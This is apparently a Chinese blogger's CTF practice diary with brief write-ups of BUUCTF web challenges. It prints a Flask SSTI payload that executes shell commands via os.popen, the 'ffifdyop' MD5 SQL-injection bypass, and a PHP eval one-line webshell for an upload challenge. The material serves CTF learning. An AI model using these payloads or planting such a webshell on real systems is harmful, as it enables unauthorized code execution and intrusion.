buu摸鱼日记(5)
[BJDCTF 2nd]fake google
这题大威天龙,大胆妖孽,我一眼就看出他是SSTI
7*7}}7*'7'}}
可以判断他是flask框架
随手测试一下,发现甚至没有过滤
推断一下,是python3
拿burp爆破一下subclasses ,就可以得到要用的类
qaq?name=().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__.__builtins__['eval']("__import__('os').popen('find / -name \"flag*\"').read()")}}
于是读取目录,find命令查找flag 发现根目录里就有flag
然后cat flag 秒杀
这题不怎么难
[BJDCTF2020]Easy MD5
说实话,题目不难,就是想不到
文件头里有个Hint(根本没看到)
select * from ‘admin’ where password=md5($pass,true)
关键是md5($pass,true)要返回一个’’ or 1这样的东西
可以写个php来爆破,也可以网上找个Payload
ffifdyop 会形成’or’6<乱七八糟的值> 构成万能密码sql注入乱七八糟的值>
后面一个是md5零值绕过 一个是数组绕过 都很简单,就不写了
[ACTF2020 新生赛]Upload
简单的传马(我居然把码写错了)
写一下重新记一下
<?php eval(@$_POST['a']);?>
[RoarCTF 2019]Easy Java
完全没学过java,所以原理并不很清楚,大致复现了一下(迷迷糊糊)
一个另类的文件包含
PREVIOUSBuu摸鱼日记(4)
NEXTSctf的斗地主真好玩